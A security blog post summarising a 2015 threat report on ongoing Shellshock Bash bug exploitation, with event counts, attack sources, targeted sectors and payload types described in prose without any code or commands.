Bash Bug Still Exploited, Report Finds 600,000 Shellshock Events in the Last 3 Months

Shellshock, the Bash bug heralded as the next Heartbleed is still being successfully exploited by attackers, 10 months after it has been revealed to the world.

Discovered in late September 2014, the bug has gone through a series of patches, but as the Solutionary Security Engineering Research Team (SERT) points out in its 2015 Q2 report, Shellshock is alive and well and is still being used even now.

SERT identified over 600,000 Shellshock-related events in the last 3 months, spread across 25,000 unique IP addresses and originating from 2,027 various service providers, businesses, and industries.

Bash Bug Still Exploited, Report Finds 600,000 Shellshock Events in the Last 3 Months

Bash Bug Still Exploited, Report Finds 600,000 Shellshock Events in the Last 3 Months

Attackers checked for Shellshock vulnerability before executing the payload

Profiling the attacks, Solutionary’s SERT team, has observed that “nearly 60% of identified Shellshock traffic was designed to determine if the hosts were vulnerable.”

If this yielded positive results, attackers would then download and execute bash shell scripts, exposing the underlying servers to their needs.

Besides shell scripts, SERT also identified that attack payloads were also delivered via .c.txt files, ELF binaries, Perl and PHP scripts.

Nearly half of attacks originated from the US

The sources of the attacks are mainly located in the US, UK, China, South Korea, Germany, and Japan.

This shouldn’t surprise anyone since these countries are also where classic and cloud-based hosting services are located most of the times.

Since hosting servers run on POSIX systems and are vulnerable, it was no surprise to the SERT team to discover that most attacks are carried out via ISPs, with GoDaddy and Korea Telecom being the two most abused.

As for the targets of the Shellshock attacks, the education sector had it the worst with 38% of all detected events, followed by technology (17%), healthcare (6%), finances (5%), and manufacturing (5%).

Besides one-off attacks, Solutionary also observed more organized operations, Shellshock campaigns carried out by well-organized groups that paid special attention at covering their tracks. The most important are listed below:



About webimprint

Webimprints is the leading company which provides global information security services to the client around the World.
This entry was posted in Cyber Security, Vulnerabilidad and tagged , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s